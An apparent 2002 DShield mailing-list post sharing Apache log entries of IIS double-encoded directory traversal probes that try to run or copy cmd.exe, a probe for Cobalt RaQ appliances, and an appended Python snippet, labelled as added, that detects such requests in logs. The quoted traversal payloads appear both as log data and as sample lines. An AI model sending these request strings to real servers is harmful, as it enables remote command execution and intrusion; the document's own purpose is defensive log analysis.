[Dshield] Target list acquisition? Pre-deployment preparation?

Ed Truitt ed.truitt at etee2k.net
Fri Nov 8 13:24:57 GMT 2002


Here are some entries I found:

65.86.37.114 - - [04/Nov/2002:21:20:50 -0600] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\script.exe HTTP/1.1" 404 320 "-" "-"
130.49.64.241 - - [05/Nov/2002:02:05:33 -0600] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\script.exe HTTP/1.1" 404 320 "-" "-"
195.31.248.194 - - [05/Nov/2002:02:49:26 -0600] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
216.106.71.186 - - [05/Nov/2002:04:35:20 -0600] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\script.exe HTTP/1.1" 404 320 "-" "-"
208.181.135.3 - - [05/Nov/2002:13:43:06 -0600] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\script.exe HTTP/1.1" 404 320 "-" "-"
66.134.238.74 - - [05/Nov/2002:13:45:36 -0600] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\script.exe HTTP/1.1" 404 320 "-" "-"
65.95.166.39 - - [05/Nov/2002:20:29:02 -0600] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\script.exe HTTP/1.1" 404 320 "-" "-"
65.93.29.79 - - [07/Nov/2002:01:30:24 -0600] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\script.exe HTTP/1.1" 404 320 "-" "-"
66.158.116.36 - - [07/Nov/2002:06:03:11 -0600] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\script.exe HTTP/1.1" 404 320 "-" "-"

Interestingly enough, I run Apache on both my Linux boxes, but only one had
the probes.  Another item of interest:

195.92.95.61 - - [06/Nov/2002:07:17:00 -0600] "HEAD /cobalt-images/welcome2.gif HTTP/1.0" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"

Somebody is looking for Cobalt RAQ appliances - any new (or old) exploits
they might be looking for?

Cheers,
Ed Truitt
PGP fingerprint:  5368 D25E 468C A250 9833  CCD6 DBAE 9C25 02F9 0AB9
http://www.etee2k.net
http://www.bsatroop148.org

"Note to spammers:  my 'delete' key is connected to YOUR ISP.
 Also, if you send me UCE, I reserve the right to post your spew
on my Web site, with the appropriate color commentary, so that
others may have a good laugh at your expense."

----- Original Message -----
From: "Johannes Ullrich" <jullrich at euclidian.com>
To: <list at dshield.org>
Sent: Thursday, November 07, 2002 8:42 PM
Subject: [Dshield] Target list acquisition? Pre-deployment preparation?
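
Added example, not part of the original post or thread: one way to flag probes like the log entries above in an Apache access log, by percent-decoding each request target until it stops changing and then checking for directory traversal and cmd.exe. The function names and the sample lines (documentation IP addresses) are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache common/combined log prefix; the HTTP version is optional because
# some probes (such as the "/c+dir" entry above) omit it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*?)(?: HTTP/\d\.\d)?" (?P<status>\d{3}) ')

def decode_layers(target, max_rounds=5):
    """Percent-decode until the string stops changing; return (text, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(target)
        if decoded == target:
            break
        target, rounds = decoded, rounds + 1
    return target, rounds

def classify(target):
    """Return the set of findings for one request target."""
    decoded, rounds = decode_layers(target)
    # Treat backslash as a path separator, as Windows does.
    flat = decoded.replace("\\", "/").lower()
    findings = set()
    if rounds >= 2:                       # e.g. %255c -> %5c -> backslash
        findings.add("multi-encoded")
    if re.search(r"(^|/)\.\.(/|$)", flat.split("?", 1)[0]):
        findings.add("traversal")
    if "cmd.exe" in flat:
        findings.add("cmd.exe")
    return findings

def scan(lines):
    """Return (ip, status, findings) for every log line with a finding."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        found = classify(m["target"]) if m else set()
        if found:
            hits.append((m["ip"], int(m["status"]), found))
    return hits

# Constructed sample lines, modelled on the entries quoted in the post.
SAMPLE = [
    r'192.0.2.10 - - [04/Nov/2002:21:20:50 -0600] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\script.exe HTTP/1.1" 404 320 "-" "-"',
    r'192.0.2.20 - - [05/Nov/2002:02:49:26 -0600] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"',
    r'192.0.2.30 - - [06/Nov/2002:07:17:00 -0600] "HEAD /cobalt-images/welcome2.gif HTTP/1.0" 404 0 "-" "Mozilla/4.0"',
    r'192.0.2.40 - - [06/Nov/2002:08:00:00 -0600] "GET /docs/a%20b.html HTTP/1.1" 200 512 "-" "-"',
]
```

The status code returned with each hit is what separates a failed probe (404) from a request that needs follow-up.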




